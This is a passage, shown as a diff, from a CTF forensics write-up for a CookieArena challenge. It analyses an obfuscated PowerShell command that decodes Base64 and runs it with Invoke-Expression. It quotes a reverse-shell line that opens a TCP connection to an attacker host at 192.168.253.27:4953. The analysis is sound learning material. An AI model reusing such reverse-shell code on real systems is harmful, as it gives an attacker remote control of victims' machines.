u53rr007/CookieArena/Digital Forensics/Sổ đăng ký/writeup.md

 + ___FOREAcH-object{ neW-obJEct io.streAMrEadeR( $_,[sysTem.TExt.EnCoDING]::asCIi )}).reaDToEnD()__: Reads the decoded PowerShell script into a string.
 + __|inVOKe-exprEsSIon__: Executes it with Invoke-Expression, likely running malware.

-So our attention is the Base64 string so I use Powershell script to decode it and write the result to __output.txt__ (__decode.ps1__).
+So our attention is the Base64 string so I use Powershell to decode it and write the result to __output.txt__ (__decode.txt__).
 Unsurprisingly, it is a __reverse shell__ script that print out the flag, read the script and you will get the flag!!

 P/S: Analyze the reverse shell:
 + __$client = New-Object System.Net.Sockets.TCPClient("192.168.253.27",4953);__: Creates a TCP connection to 192.168.253.27:4953.
 Attacker machine!!